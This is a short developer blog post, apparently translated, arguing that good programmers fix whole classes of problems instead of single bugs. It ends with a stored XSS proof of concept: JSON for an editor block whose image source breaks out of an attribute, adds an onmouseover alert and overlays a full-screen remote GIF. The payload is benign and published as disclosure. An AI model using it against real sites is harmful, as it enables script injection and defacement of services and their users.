How a good programmer differs from a bad one, or why you need to go beyond
This will be my shortest article.
Once upon a time I was young and green and I solved problems exactly the way the juniors solve them. The algorithm is this:
-
Learn about the problem
-
Localize the problem
-
Google the problem and solution
-
Fix the problem
For example: the excel file contains an error and therefore cannot be processed. I opened the file, edited the problematic line, closed the file. Problem solved.
Or another example: the script did not work due to an error in the code. I fix the error, the script starts to work.
10 years have passed… The algorithm has changed:
-
Learn about the problem
-
Localize the problem
-
Google the problem and see many solutions
-
Understand why it happened
-
Know what needs to be done to make sure this doesn’t happen again.
-
Understand what else is affected by the problem
-
Understand where else similar problems could potentially occur
-
Fix the problem
-
Depending on the amount of effort required, fix everything related
-
Tell the guys in Slack about your fail (== share your experience)
For example: the excel file contains an error and therefore cannot be processed. I open the file, figure out how the problematic line got into it, try to make sure that it doesn’t get there anymore, look for the same erroneous lines in the file, look for other potential errors, fix the file myself or wrap it up for revision. Problem solved – either fully, either partially, but with full awareness of this fact.
Or another example: the script did not work due to an error in the code. I figure out who wrote the script, why I wrote it with pens instead of calling some command for configuration and deployment, where else such errors can occur (both in this project and in projects of other clients), I fix it and do my best to make it didn’t happen again.
Why all this
Please don’t solve a specific problem. It never works. It will break again.
Solve a class of problems. Go beyond the problem, look for similar ones, look for related ones. Be responsible and curious.
Otherwise, I will still find XSS in the same places that I wrote about earlier.
Nothing is stolen or broken
And if not bold, then here is the traditional video:
The payload is the same as in the previous article:
{
"type": "persona",
"attrs": {
"inserted": false
},
"content": [
{
"type": "persona_image",
"attrs": {
"src": "javascript:\"></a>
<div/onmouseover=alert('xss')>
<div/style=\"position:fixed;bottom:0;width:100%;height:100vh;background-image:url('https://c.tenor.com/GjsMO1r7HGMAAAAC/hyenas-lion-king.gif');background-position:center;background-repeat:no-repeat;background-size:cover;\">
</div>
</div>
<!--<a",
"class": "image image-persona"
}
},
{
"type": "persona_heading",
"content": [
{
"type": "text",
"text": "<-- Нажимайте сюда"
}
]
},
{
"type": "paragraph",
"attrs": {
"align": null,
"simple": false,
"persona": false
}
}
]
}Come into my cart: Pogromist’s blog. It’s just a link, not XSS 🙂
